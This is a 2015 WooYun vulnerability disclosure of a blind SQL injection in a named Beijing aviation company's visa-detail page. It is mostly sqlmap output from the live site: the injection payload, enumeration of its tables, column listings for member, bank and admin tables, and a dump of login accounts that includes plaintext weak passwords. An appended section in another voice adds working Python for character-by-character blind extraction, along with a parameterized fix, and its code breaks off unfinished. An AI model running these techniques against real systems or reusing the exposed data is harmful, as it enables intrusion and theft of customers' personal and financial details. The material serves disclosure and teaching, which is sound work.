Vulnerability summary

Defect ID: wooyun-2015-0111591

Title: Boolean-based blind SQL injection in the visa-service detail page of a Beijing aviation-services company (leaks users' personal data)

Vendor: 北京海华航空服务有限公司 (Beijing Haihua Aviation Service Co., Ltd.)

Author: 帅克笛枫

Submitted: 2015-05-02 07:04

Fixed: 2015-06-20 18:46

Published: 2015-06-20 18:46

Type: mass leakage of user data

Severity: High

Self-assessed Rank: 20

Status: handed to a third-party partner organisation (CNCERT, the national internet emergency response centre) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]

Vulnerability details

Disclosure status:

2015-05-02: details sent to the vendor, awaiting vendor handling
2015-05-06: vendor confirmed the issue; details visible to the vendor only
2015-05-16: details opened to core white hats and domain experts
2015-05-26: details opened to regular white hats
2015-06-05: details opened to intern white hats
2015-06-20: details made public

Brief description:

The visa-service detail page of a Beijing aviation-services company has a boolean-based blind SQL injection that leaks users' personal data (including registered users' bank-card numbers and account balances, administrator and registered-user account passwords, B2B agent account passwords, flight-ticket order and payment records, and other details).
Hmm, well, we once sang in the fields and hoped through the winter, but never got to see this autumn scene under the sun; so let the scattered vows fly~~

Detailed description:

The visa-service detail page of 北京海华航空服务有限公司 has a boolean-based blind SQL injection that leaks users' personal data (including registered users' bank-card numbers and account balances, administrator and registered-user account passwords, B2B agent account passwords, flight-ticket order and payment records, and other details).
Open http://www.h-h.com.cn/visa/view_visa.aspx?id=17 to view the visa-service details, as shown:

qz1.png

Feed the URL of the visa-service detail page into sqlmap, as shown:

qz2.png

The six databases on the server are listed directly:
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 00:33:38
[00:33:38] [INFO] resuming back-end DBMS 'microsoft sql server'
[00:33:38] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=17 AND 2620=2620
---
[00:33:39] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
[00:33:39] [INFO] fetching database names
[00:33:39] [INFO] fetching number of databases
[00:33:39] [INFO] resumed: 6
[00:33:39] [INFO] resumed: AgentDB
[00:33:39] [INFO] resumed: haihua_pek
[00:33:39] [INFO] resumed: master
[00:33:39] [INFO] resumed: model
[00:33:39] [INFO] resumed: msdb
[00:33:39] [INFO] resumed: tempdb
available databases [6]:
[*] AgentDB
[*] haihua_pek
[*] master
[*] model
[*] msdb
[*] tempdb
Check the current database and its privileges, as shown:

qz15.png

List all tables in the haihua_pek database, as shown:

qz4.png

[07:19:21] [INFO] resumed: dbo.Hotel_StaticInfos
[07:19:21] [INFO] resumed: dbo.huoche
[07:19:21] [INFO] resumed: dbo.Inuoice
[07:19:21] [INFO] resumed: dbo.jbitem
[07:19:21] [INFO] resumed: dbo.jp_detail
[07:19:21] [INFO] resumed: dbo.jp_line
[07:19:21] [INFO] resumed: dbo.kefu
[07:19:21] [INFO] resumed: dbo.kefu_files
[07:19:21] [INFO] resumed: dbo.kefu_mail
[07:19:21] [INFO] resumed: dbo.kefubm
[07:19:21] [INFO] resumed: dbo.kq_history
[07:19:21] [INFO] resumed: dbo.kq_items
[07:19:21] [INFO] resumed: dbo.ldt_history
[07:19:21] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[07:19:21] [INFO] retrieved:
[07:19:21] [WARNING] reflective value(s) found and filtering out
dbo.link
[07:19:39] [INFO] retrieved: dbo.lu_items
[07:20:02] [INFO] retrieved: dbo.lv_items_mb
[07:20:33] [INFO] retrieved: dbo.lv_orders_mx
[07:21:07] [INFO] retrieved: dbo.lv@scl@ss
[07:21:29] [INFO] retrieved: dbo.member
[07:21:45] [INFO] retrieved: dbo.member_sales
[07:22:12] [INFO] retrieved: dbo.member_sales_his
[07:22:54] [INFO] retrieved: dbo.member_table
[07:23:24] [INFO] retrieved: dbo.member_yu
[07:23:48] [INFO] retrieved: dbo.menu_b
[07:24:06] [INFO] retrieved: dbo.menu_s
[07:24:26] [INFO] retrieved: dbo.message_mb
[07:24:52] [INFO] retrieved: dbo.money_mx
[07:25:17] [INFO] retrieved: dbo.money_other
[07:25:48] [INFO] retrieved: dbo.MybunkMessage
[07:26:25] [INFO] retrieved: dbo.neus_read
[07:26:52] [INFO] retrieved: dbo.Notebook
[07:27:17] [INFO] retrieved: dbo.oa_item
[07:27:37] [INFO] retrieved: dbo.oa_main
[07:28:00] [INFO] retrieved: dbo.ordersPdesign
[07:28:35] [INFO] retrieved: dbo.otherclass
[07:29:01] [INFO] retrieved: dbo.OtherParm
[07:29:37] [INFO] retrieved: dbo.pay_money
[07:30:01] [INFO] retrieved: dbo.pay_money_main
[07:30:36] [INFO] retrieved: dbo.pay_money_other
[07:31:15] [INFO] retrieved: dbo.payfs
[07:31:31] [INFO] retrieved: dbo.PayOut
[07:31:49] [INFO] retrieved: dbo.piaobei
[07:32:12] [INFO] retrieved: dbo.piaodian
[07:32:34] [INFO] retrieved: dbo.piaodian_yu
[07:33:05] [INFO] retrieved: dbo.plane_uinhao
[07:33:37] [INFO] retrieved: dbo.pnr
[07:33:49] [INFO] retrieved: dbo.pnr_history
[07:34:23] [INFO] retrieved: dbo.pnrdetail
[07:34:47] [INFO] retrieved: dbo.postMain
[07:35:09] [INFO] retrieved: dbo.po`tRe
[07:35:27] [INFO] retrieved: dbo.ptype_set
[07:35:54] [INFO] retrieved: dbo.Report_mb
[07:36:22] [INFO] retrieved: dbo.Report_mb_member
[07:37:01] [INFO] retrieved: dbo.resms
[07:37:22] [INFO] retrieved: dbo.Roles
[07:37:38] [INFO] retrieved: dbo.Roles_flag
[07:38:07] [INFO] retrieved: dbo.room
[07:38:21] [INFO] retrieved: dbo.sahestable
[07:38:48] [INFO] retrieved: dbo.sfk_submit
[07:39:15] [INFO] retrieved: dbo.sfj_submit_mu
[07:39:48] [INFO] retrieved: dbo.sfkmx_other_uiew
[07:40:27] [INFO] retrieved: dbo.sfkmx_uiew
[07:40:53] [INFO] retrieved: dbo.shop_bigclass
[07:41:25] [INFO] retrieved: dbo.shnp_order
[07:41:52] [INFO] retrieved: dbo.shop_product
[07:42:24] [INFO] retrieved: dbo.shop_smallclass
[07:43:04] [INFO] retrieved: dbo.sms
[07:43:15] [INFO] retrieved: dbo.smr_key
[07:43:38] [INFO] retrieved: dbo.soupiaoren
[07:44:05] [INFO] retrieved: dbo.sys_nat
[07:44:25] [INFO] retrieved: dbo.System_info
[07:44:57] [INFO] retrieved: dbo.system_tx
[07:45:22] [INFO] retrieved: dbo.System_Warn
[07:45:51] [INFO] retrieved: dbo.tourbig
[07:46:11] [INFO] retrieved: dbo.tourclass
[07:46:37] [INFO] retrieved: dbo.tourday
[07:46:57] [INFO] retrieved: dbo.tourline
[07:47:24] [INFO] retrieved: dbo.tourlist
[07:47:46] [INFO] retrieved: dbo.tourneus
[07:48:08] [INFO] retrieved: dbo.tourorder
[07:48:33] [INFO] retrieved: dbo.Tplanetype
[07:48:59] [INFO] retrieved: dbo.traininfo
[07:49:24] [INFO] retrieved: dbo.trauel_item
[07:49:59] [INFO] retrieved: dbo.trauel_money
[07:50:29] [INFO] retrieved: dbo.trauel_order
[07:51:00] [INFO] retrieved: dbo trauel_order_detail
[07:51:53] [INFO] retrieved: dbo.tuipiao
[07:52:17] [INFO] retrieved: dbo.vieu_cu
[07:52:36] [INFO] retrieved: dbo.vieu_hctuipiao
[07:53:11] [INFO] retrieved: dbo.vieu_js
[07:53:31] [INFO] retrieved: dbo.vieu_kefu
[07:53:55] [INFO] retrieved: dbo.vieu_kq_history
[07:54:32] [INFO] retrieved: dbo.vieu_ldhistory
[07:55:06] [INFO] retrieved: dbo(vieu_member_yu
[07:55:41] [INFO] retrieved: dbo.vieu_pay_mx_main
[07:56:23] [INFO] retrieved: dbo.vieu_piaodian_yu
[07:57:04] [INFO] retrieved: dbo.vieu_scgq
[07:57:28] [INFO] retrieved: dbo,vieu_travel_order
[07:58:09] [INFO] retrieved: dbo-vieu_tuipiao
[07:58:45] [INFO] retrieved: dbo.vieubmpnr
[07:59:09] [INFO] retrieved: dbo.vieucjr
[07:59:29] [INFO] retrieved: dbo.vieugjticket
[08:00:03] [INFO] retrieved: dbo.vieuhc
[08:00:21] [INFO] retrieved: dbo.vieuother
[08:00:48] [INFO] retrieved: dbo.vieupnr
[08:01:08] [INFO] retrieved: dbo.Visor
[08:01:24] [INFO] retrieved: dbo.Wage_tab
[08:01:46] [INFO] retrieved: dbo.vtgroup
[08:02:06] [INFO] retrieved: dbo.vtOrderDetails
[08:02:40] [INFO] retrieved: dbo.vtOrders
[08:03:02] [INFO] retrieved: dbo.vttgclass
[08:03:29] [INFO] retrieved: dbo.vcd_ps_main
[08:03:58] [INFO] retrieved: dbo.yc_group
[08:04:19] [INFO] retrieved: dbo.yjbooks
[08:04:40] [INFO] retrieved: dbo.zc_class
[08:05:05] [INFO] retrieved: dbo.zc_list
[08:05:25] [INFO] retrieved: dbo.zclist
[08:05:43] [INFO] retrieved: dbo.zy@cla@s
[08:06:05] [INFO] retrieved: dbo.zy_zclist
Database: haihua_pek
[166 tables]
+---------------------------+
| [dbo ft_TAPrice] |
| [dbo trauel_order_detail] |
| [dbo(hide_flight] |
| [dbo(vieu_member_yu] |
| [dbo,Hotel_OrderInfo] |
| [dbo,vieu_travel_order] |
| [dbo-Hotel_PageSumInfo] |
| [dbo-vieu_tuipiao] |
| dbo.Airvays |
| dbo.Bank |
| dbo.CW_out |
| dbo.Hotel_City |
| dbo.Hotel_LandMarks |
| dbo.Hotel_SingleAvail |
| dbo.Hotel_StaticInfos |
| dbo.Inuoice |
| dbo.MybunkMessage |
| dbo.Notebook |
| dbo.OtherParm |
| dbo.PayOut |
| dbo.Report_mb |
| dbo.Report_mb_member |
| dbo.Roles |
| dbo.Roles_flag |
| dbo.System_Warn |
| dbo.System_info |
| dbo.Tplanetype |
| dbo.Visor |
| dbo.Wage_tab |
| dbo.[po`tRe] |
| dbo.admin |
| dbo.air |
| dbo.air_cab_class |
| dbo.aircity |
| dbo.airpiao |
| dbo.b2b_users |
| dbo.bm_login |
| dbo.books |
| dbo.bu_base |
| dbo.bu_product |
| dbo.cardnumjl |
| dbo.cgimg |
| dbo.cjr_login |
| dbo.cjrcard |
| dbo.company_bm |
| dbo.company_center |
| dbo.company_clk |
| dbo.company_flag |
| dbo.company_logo |
| dbo.company_news |
| dbo.company_sms |
| dbo.contact_info |
| dbo.cv_gd |
| dbo.cvkou |
| dbo.dbbak_history |
| dbo.fau_send |
| dbo.fau_submit |
| dbo.ft_City |
| dbo.ft_Config |
| dbo.gjqz |
| dbo.gjqz_f |
| dbo.gjticket |
| dbo.hccity |
| dbo.hcsheng |
| dbo.hcsite |
| dbo.hf_history |
| dbo.hotel |
| dbo.huoche |
| dbo.jbitem |
| dbo.jp_detail |
| dbo.jp_line |
| dbo.kefu |
| dbo.kefu_files |
| dbo.kefu_mail |
| dbo.kefubm |
| dbo.kq_history |
| dbo.kq_items |
| dbo.ldt_history |
| dbo.link |
| dbo.lu_items |
| dbo.lv@scl@ss |
| dbo.lv_items_mb |
| dbo.lv_orders_mx |
| dbo.member |
| dbo.member_sales |
| dbo.member_sales_his |
| dbo.member_table |
| dbo.member_yu |
| dbo.menu_b |
| dbo.menu_s |
| dbo.message_mb |
| dbo.money_mx |
| dbo.money_other |
| dbo.neus_read |
| dbo.oa_item |
| dbo.oa_main |
| dbo.ordersPdesign |
| dbo.otherclass |
| dbo.pay_money |
| dbo.pay_money_main |
| dbo.pay_money_other |
| dbo.payfs |
| dbo.piaobei |
| dbo.piaodian |
| dbo.piaodian_yu |
| dbo.plane_uinhao |
| dbo.pnr |
| dbo.pnr_history |
| dbo.pnrdetail |
| dbo.postMain |
| dbo.ptype_set |
| dbo.resms |
| dbo.room |
| dbo.sahestable |
| dbo.sfj_submit_mu |
| dbo.sfk_submit |
| dbo.sfkmx_other_uiew |
| dbo.sfkmx_uiew |
| dbo.shnp_order |
| dbo.shop_bigclass |
| dbo.shop_product |
| dbo.shop_smallclass |
| dbo.smr_key |
| dbo.sms |
| dbo.soupiaoren |
| dbo.sys_nat |
| dbo.system_tx |
| dbo.tourbig |
| dbo.tourclass |
| dbo.tourday |
| dbo.tourline |
| dbo.tourlist |
| dbo.tourneus |
| dbo.tourorder |
| dbo.traininfo |
| dbo.trauel_item |
| dbo.trauel_money |
| dbo.trauel_order |
| dbo.tuipiao |
| dbo.vcd_ps_main |
| dbo.vieu_cu |
| dbo.vieu_hctuipiao |
| dbo.vieu_js |
| dbo.vieu_kefu |
| dbo.vieu_kq_history |
| dbo.vieu_ldhistory |
| dbo.vieu_pay_mx_main |
| dbo.vieu_piaodian_yu |
| dbo.vieu_scgq |
| dbo.vieubmpnr |
| dbo.vieucjr |
| dbo.vieugjticket |
| dbo.vieuhc |
| dbo.vieuother |
| dbo.vieupnr |
| dbo.vtOrderDetails |
| dbo.vtOrders |
| dbo.vtgroup |
| dbo.vttgclass |
| dbo.yc_group |
| dbo.yjbooks |
| dbo.zc_class |
| dbo.zc_list |
| dbo.zclist |
| dbo.zy@cla@s |
| dbo.zy_zclist |
+---------------------------+
[08:06:29] [INFO] fetched data logged to text files under 'F:\x\SQLMAP~1\Bin\output\www.h-h.com.cn'
List the data in the database's Bank table, as shown:

qz9.png

qz10.png

Look at the data in the related flight-ticket order tables, as shown:

qz13.png

Proof of vulnerability:

qz14.png

The database exposes the login data of the B2B agents (b2b_users) and of the bm_login accounts, as shown:

qz13.png

qz14.png

[10:28:14] [INFO] fetching columns for table 'bm_login' in database 'haihua_pek'
[10:28:14] [INFO] resumed: 6
[10:28:14] [INFO] resumed: bm
[10:28:14] [INFO] resumed: bmpwd
[10:28:14] [INFO] resumed: card
[10:28:14] [INFO] resumed: Memberid
[10:28:14] [INFO] resumed: name
[10:28:14] [INFO] resumed: username
[10:28:14] [INFO] fetching entries for table 'bm_login' in database 'haihua_pek'
[10:28:14] [INFO] fetching number of entries for table 'bm_login' in database 'haihua_pek'
[10:28:14] [INFO] retrieved: 29
[10:28:17] [INFO] fetching number of distinct values for column 'bm'
[10:28:17] [INFO] retrieved: 29
[10:28:19] [INFO] using column 'bm' as a pivot for retrieving row data
[10:28:19] [INFO] retrieved: A
[10:28:32] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.
?
[10:28:34] [INFO] retrieved: TZSBJC
[10:28:45] [INFO] retrieved: GP ??????
[10:29:47] [INFO] retrieved:
[10:29:49] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'
[10:29:49] [INFO] retrieved: 602
[10:29:56] [INFO] retrieved: TZSBJC
[10:30:08] [INFO] retrieved: B?
[10:30:21] [INFO] retrieved: TZSBJC
[10:30:33] [INFO] retrieved: GP ??????
[10:31:33] [INFO] retrieved:
[10:31:35] [INFO] retrieved: 602
[10:31:43] [INFO] retrieved: TZSBJC
[10:31:58] [INFO] retrieved: C?
[10:32:11] [INFO] retrieved: TZSBJC
[10:32:26] [INFO] retrieved: GP ??????
[10:33:28] [INFO] retrieved:
[10:33:30] [INFO] retrieved: 602
[10:33:37] [INFO] retrieved: TZSBJC
[10:33:49] [INFO] retrieved: D?
[10:34:02] [INFO] retrieved: TZSBJC
[10:34:14] [INFO] retrieved: GP ??????
[10:35:26] [INFO] retrieved:
[10:35:28] [INFO] retrieved: 602
[10:35:36] [INFO] retrieved: TZSBJC
[10:35:48] [INFO] retrieved: E?
[10:36:01] [INFO] retrieved: TZSBJC
[10:36:14] [INFO] retrieved: GP ??????
[10:37:15] [INFO] retrieved:
[10:37:17] [INFO] retrieved: 602
[10:37:24] [INFO] retrieved: TZSBJC
[10:37:38] [INFO] retrieved: sl
[10:37:44] [INFO] retrieved: GAH
[10:37:51] [INFO] retrieved: ???
[10:38:21] [INFO] retrieved: 123456
[10:38:34] [INFO] retrieved: 41
[10:38:40] [INFO] retrieved: GAH
[10:38:47] [INFO] retrieved: TTYY
[10:38:57] [INFO] retrieved: GAH
[10:39:04] [INFO] retrieved: ???
[10:39:34] [INFO] retrieved:
[10:39:36] [INFO] retrieved: 41
[10:39:42] [INFO] retrieved: GAH
[10:39:49] [INFO] retrieved: wwwwtt
[10:40:03] [INFO] retrieved: SHKJYJY
[10:40:17] [INFO] retrieved: (??)?????????
[10:42:06] [INFO] retrieved:
[10:42:08] [INFO] retrieved: 3
[10:42:11] [INFO] retrieved: SHKJYJY
[10:42:29] [INFO] retrieved: ?????
[10:43:17] [INFO] retrieved: SHKJYJY
[10:43:31] [INFO] retrieved: (??)?????????
[10:45:11] [INFO] retrieved:
[10:45:13] [INFO] retrieved: 3
[10:45:16] [INFO] retrieved: SHKJYJY
[10:45:34] [INFO] retrieved: ???
[10:46:02] [INFO] retrieved: XZLZW
[10:46:13] [INFO] retrieved: ???
[10:46:42] [INFO] retrieved:
[10:46:44] [INFO] retrieved: 33
[10:46:49] [INFO] retrieved: XZLZW
[10:46:59] [INFO] retrieved: ???????
[10:48:12] [INFO] retrieved: SHKJYJY
[10:48:27] [INFO] retrieved: (??)?????????
[10:50:23] [INFO] retrieved:
[10:50:25] [INFO] retrieved: 3
[10:50:29] [INFO] retrieved: SHKJYJY
[10:50:50] [INFO] retrieved: ????
[10:51:31] [INFO] retrieved: QYSD
[10:51:40] [INFO] retrieved: (??)????
[10:52:32] [INFO] retrieved:
[10:52:34] [INFO] retrieved: 66
[10:52:39] [INFO] retrieved: QYSD
[10:52:47] [INFO] retrieved: ????????
[10:53:54] [INFO] retrieved: YSXY
[10:54:03] [INFO] retrieved: GP ??????
[10:55:13] [INFO] retrieved:
[10:55:15] [INFO] retrieved: 118
[10:55:22] [INFO] retrieved: YSXY
[10:55:31] [INFO] retrieved: ???
[10:56:02] [INFO] retrieved: 21SJYCGL
[10:56:19] [INFO] retrieved: GP 21?????/???
[10:57:43] [INFO] retrieved: 123456
[10:57:55] [INFO] retrieved: 175
[10:58:03] [INFO] retrieved: 21SJYCGL
[10:58:20] [INFO] retrieved: ??????
[10:59:20] [INFO] retrieved: HZM
[10:59:31] [INFO] retrieved: ???
[11:00:06] [INFO] retrieved:
[11:00:08] [INFO] retrieved: 5
[11:00:11] [INFO] retrieved: HZM
[11:00:19] [INFO] retrieved: ????????
[11:02:09] [INFO] retrieved: SHKJYJY
[11:02:23] [INFO] retrieved: (??)?????????
[11:04:08] [INFO] retrieved:
[11:04:10] [INFO] retrieved: 3
[11:04:14] [INFO] retrieved: SHKJYJY
[11:04:28] [INFO] retrieved: ??????
[11:05:22] [INFO] retrieved: YSXY
[11:05:31] [INFO] retrieved: GP ??????
[11:06:32] [INFO] retrieved:
[11:06:34] [INFO] retrieved: 118
[11:06:41] [INFO] retrieved: YSXY
[11:06:50] [INFO] retrieved: ?????
[11:07:37] [INFO] retrieved: SHKJYJY
[11:07:52] [INFO] retrieved: (??)?????????
[11:09:38] [INFO] retrieved:
[11:09:40] [INFO] retrieved: 3
[11:09:44] [INFO] retrieved: SHKJYJY
[11:09:57] [INFO] retrieved: ????
[11:10:32] [INFO] retrieved: LX
[11:10:41] [INFO] retrieved: ??
[11:11:02] [INFO] retrieved:
[11:11:04] [INFO] retrieved: 7
[11:11:08] [INFO] retrieved: LX
[11:11:12] [INFO] retrieved: ?????
[11:11:58] [INFO] retrieved: YSXY
[11:12:08] [INFO] retrieved: GP ??????
[11:13:08] [INFO] retrieved:
[11:13:10] [INFO] retrieved: 118
[11:13:16] [INFO] retrieved: YSXY
[11:13:25] [INFO] retrieved: ?????
[11:14:09] [INFO] retrieved: SHKJYJY
[11:14:23] [INFO] retrieved: (??)?????????
[11:16:03] [INFO] retrieved:
[11:16:05] [INFO] retrieved: 3
[11:16:08] [INFO] retrieved: SHKJYJY
[11:16:22] [INFO] retrieved: ????
[11:17:02] [INFO] retrieved: QYSD
[11:17:11] [INFO] retrieved: (??)????
[11:18:11] [INFO] retrieved:
[11:18:12] [INFO] retrieved: 66
[11:18:18] [INFO] retrieved: QYSD
[11:18:31] [INFO] retrieved: ??
[11:18:52] [INFO] retrieved: YSXY
[11:19:01] [INFO] retrieved: GP ??????
[11:20:08] [INFO] retrieved:
[11:20:10] [INFO] retrieved: 118
[11:20:18] [INFO] retrieved: YSXY
[11:20:27] [INFO] retrieved: ?????
[11:21:15] [INFO] retrieved: SHKJYJY
[11:21:30] [INFO] retrieved: (??)?????????
[11:23:21] [INFO] retrieved:
[11:23:23] [INFO] retrieved: 3
[11:23:26] [INFO] retrieved: SHKJYJY
[11:23:41] [INFO] retrieved: ???
[11:24:13] [INFO] retrieved: SHKJYJY
[11:24:31] [INFO] retrieved: (??)?????????
[11:26:20] [INFO] retrieved:
[11:26:22] [INFO] retrieved: 3
[11:26:26] [INFO] retrieved: SHKJYJY
[11:26:41] [INFO] retrieved: ?????
[11:20:41] [INFO] retrieved: JKZDS
[11:20:52] [INFO] retrieved: GP ??????????
[11:22:37] [INFO] retrieved:
[11:22:39] [INFO] retrieved: 341
[11:22:46] [INFO] retrieved: JKZDS
[11:22:58] [INFO] retrieved: ???
[11:23:27] [INFO] retrieved: 21SJYCGL
[11:23:45] [INFO] retrieved: GP 21?????/???
[11:25:11] [INFO] retrieved: 123456
[11:25:24] [INFO] retrieved: 175
[11:25:32] [INFO] retrieved: 21SJYCGL
[11:25:49] [INFO] retrieved: ?????
[11:26:38] [INFO] retrieved: SHKJYJY
[11:26:53] [INFO] retrieved: (??)?????????
[11:28:40] [INFO] retrieved:
[11:28:42] [INFO] retrieved: 3
[11:28:46] [INFO] retrieved: SHKJYJY
[11:29:00] [INFO] retrieved: ???
[11:29:27] [INFO] retrieved: ZSJY
[11:29:38] [INFO] retrieved: (??)????
[11:30:35] [INFO] retrieved: 123456
[11:30:47] [INFO] retrieved: 2
[11:30:51] [INFO] retrieved: ZSJY
[11:31:00] [INFO] analyzing table dump for possible password hashes
Database: haihua_pek
Table: dbo.bm_login
[29 entries]
The payment records in pay_money likewise expose the corresponding paybank and paymoney values:

qz16.png

qz17.png

Related hotel information, as shown:

qz18.png

qz19.png


Database: haihua_pek
Table: dbo.hotel
[16 columns]
+-------------+----------+
| Column | Type |
+-------------+----------+
| bed | int |
| c_name | nvarchar |
| card | ntext |
| casino | nvarchar |
| city | nvarchar |
| contactinfo | ntext |
| eatery | nvarchar |
| id | int |
| info | ntext |
| level | nvarchar |
| mainshow | int |
| picurl | nvarchar |
| picurl2 | nvarchar |
| picurl3 | nvarchar |
| services | nvarchar |
| zcprice | nvarchar |
+-------------+----------+
[00:47:02] [INFO] fetching columns for table 'hotel' in database 'haihua_pek'
[00:47:02] [INFO] resumed: 16
[00:47:02] [INFO] resumed: bed
[00:47:02] [INFO] resumed: c_name
[00:47:02] [INFO] resumed: card
[00:47:02] [INFO] resumed: casino
[00:47:02] [INFO] resumed: city
[00:47:02] [INFO] resumed: contactinfo
[00:47:02] [INFO] resumed: eatery
[00:47:02] [INFO] resumed: id
[00:47:02] [INFO] resumed: info
[00:47:02] [INFO] resumed: level
[00:47:02] [INFO] resumed: mainshow
[00:47:02] [INFO] resumed: picurl
[00:47:02] [INFO] resumed: picurl2
[00:47:02] [INFO] resumed: picurl3
[00:47:02] [INFO] resumed: services
[00:47:02] [INFO] resumed: zcprice
[00:47:02] [INFO] fetching entries for table 'hotel' in database 'haihua_pek'
[00:47:02] [INFO] fetching number of entries for table 'hotel' in database 'haihua_pek'
[00:47:02] [INFO] retrieved: 0
[00:47:04] [WARNING] table 'hotel' in database 'haihua_pek' appears to be empty
Database: haihua_pek
Table: dbo.hotel
[0 entries]
+----+-----+------+------+------+-------+--------+--------+--------+--------+---------+---------+---------+----------+----------+-------------+
| id | bed | info | city | card | level | c_name | casino | eatery | picurl | picurl2 | picurl3 | zcprice | mainshow | services | contactinfo |
+----+-----+------+------+------+-------+--------+--------+--------+--------+---------+---------+---------+----------+----------+-------------+
+----+-----+------+------+------+-------+--------+--------+--------+--------+---------+---------+---------+----------+----------+-------------+
[00:47:04] [INFO] table 'haihua_pek.dbo.hotel' dumped to CSV file 'F:\x\SQLMAP~1\Bin\output\www.h-h.com.cn\dump\haihua_pek\hotel.csv'
[00:47:04] [INFO] fetched data logged to text files under 'F:\x\SQLMAP~1\Bin\output\www.h-h.com.cn'
Administrator account information in dbo.admin, as shown:

qz8.png

Registered member information, as follows:
Database: haihua_pek
Table: dbo.member
[42 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| address | nvarchar |
| api_mail | text |
| api_sms | text |
| birthday | nvarcdar |
| card | nvarchar |
| cardnum | int |
| cn_cardnum | float |
| content | text |
| fax | varchar |
| gjyhzc | float |
| gjzl | float |
| gnzl | float |
| int_cardnum | float |
| jsfs | varchar |
| jsfs_day | varchar |
| jycd | nvarchar |
| kefu | varchar |
| level | nvarchar |
| lsed | money |
| mail | nvarchar |
| Memberid | int |
| mobile | nvarchar |
| money | nvarchar |
| msn | nvarchar |
| name | varchar |
| phone | nvarchar |
| postcode | varchar |
| qq | nvarchar |
| regdate | datetime |
| sales | varchar |
| sfz | nvarchar |
| sh | int |
| UserAnswer | nvarchar |
| username | nvarchar |
| userpassword | nvarchar |
| UserQuesion | nvarchar |
| usersex | nvarchar |
| xyed | money |
| yhfs | int |
| yhzc | float |
| yumoney | money |
| ztype | nvarchar |
+--------------+----------+
[00:57:21] [INFO] fetched data logged to text files under 'F:\x\SQLMAP~1\Bin\output\www.h-h.com.cn'
Database: haihua_pek
Table: dbo.member_sales
[22 columns]
+----------+----------+
| Column | Type |
+----------+----------+
| address | varchar |
| email | varchar |
| fax | varchar |
| fields1 | varchar |
| fields2 | varchar |
| fields3 | varchar |
| fields4 | varchar |
| fields5 | varchar |
| lxr | varchar |
| mail | varchar |
| Memberid | int |
| mobile | varchar |
| msn | varchar |
| name | varchar |
| phone | varchar |
| qq | varchar |
| regdate | datetime |
| remask | text |
| sales | varchar |
| username | varchar |
| visble | varchar |
| zt | varchar |
+----------+----------+
[01:09:31] [INFO] fetched data logged to text files under 'F:\x\SQLMAP~1\Bin\output\www.h-h.com.cn'

qz20.png


The database holds a great many tables and dumping them took a long time, so only a selection is listed here.

Fix:

Filter the input ~~ you are better at fixing this than I am ~~
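To make the two technical points of this report concrete, the sqlmap finding in the detailed description (an AND boolean-based blind injection in the `id` parameter of view_visa.aspx) and the fix, here is an added example that is not the report's own code nor the site's. It stands in for the ASP.NET/MS SQL Server target with an in-memory sqlite3 database so it runs offline; the table and column names (visa, admin, username, userpassword) and the sample rows are constructed for the demo. It shows the vulnerable lookup beside its parameterized replacement, the `id=17 AND 2620=2620` versus false-conjunct check that sqlmap reported, and the per-character bisection that turns a yes/no page into a dump of a credentials table. It also shows what an intermittently failing oracle does to the recovered string: one wrong answer mid-bisection yields a wrong code point, which is consistent with the corrupted names in the table list above (`dbo.Inuoice`, `dbo.vieu_...`, `dbo(vieu_member_yu`, `dbo,vieu_travel_order`) and with sqlmap's own warnings about reflective values and the `--no-cast`/`--hex` switches.

```python
"""Boolean-based blind SQL injection, reproduced against a local stand-in.

Added example, not code from the original report. The real target is an
ASP.NET page backed by MS SQL Server; this stand-in uses sqlite3 so it runs
offline. Table and column names (visa, admin, username, userpassword) and
the sample rows are constructed for the demo.
"""
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE visa(id INTEGER, title TEXT);
INSERT INTO visa VALUES (17, 'Schengen tourist visa');
CREATE TABLE admin(username TEXT, userpassword TEXT);
INSERT INTO admin VALUES ('admin', 's3cret');
""")


def vulnerable_page(id_param: str) -> bool:
    """view_visa.aspx stand-in: concatenates ?id= into the SQL text.
    Returns True when a visa record renders (that is the boolean oracle)."""
    sql = "SELECT title FROM visa WHERE id=" + id_param   # the injection point
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:                                  # error page -> "false"
        return False


def fixed_page(id_param: str) -> bool:
    """Same lookup with a typed, bound parameter; input never reaches the parser."""
    try:
        id_value = int(id_param)
    except ValueError:
        return False
    row = conn.execute("SELECT title FROM visa WHERE id=?", (id_value,)).fetchone()
    return row is not None


def is_injectable(page) -> bool:
    """sqlmap's 'AND boolean-based blind - WHERE or HAVING clause' check:
    a true conjunct (id=17 AND 2620=2620) must behave like the plain request
    and a false conjunct must not."""
    return page("17") and page("17 AND 2620=2620") and not page("17 AND 2620=2621")


def extract(page, expr: str, max_len: int = 64) -> str:
    """Recover the scalar result of sub-select `expr` one character at a time
    by bisecting on its code point: 7 yes/no requests per character.
    SQLite dialect: unicode(substr(...)); on MS SQL Server the same probe is
    ASCII(SUBSTRING((SELECT TOP 1 ...),pos,1)) > mid."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            probe = f"17 AND (unicode(substr(({expr}),{pos},1)) > {mid})"
            if page(probe):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:          # past the end: substr() is '', unicode('') is NULL
            break
        out += chr(lo)
    return out


def unstable(page, every: int):
    """Wrap an oracle so that every `every`-th request fails closed (False),
    as a timeout or error page would. A single wrong answer inside a
    bisection lands on a neighbouring code point, so the dump comes back
    with plausible-looking but wrong characters."""
    count = 0

    def wrapped(id_param: str) -> bool:
        nonlocal count
        count += 1
        return False if count % every == 0 else page(id_param)
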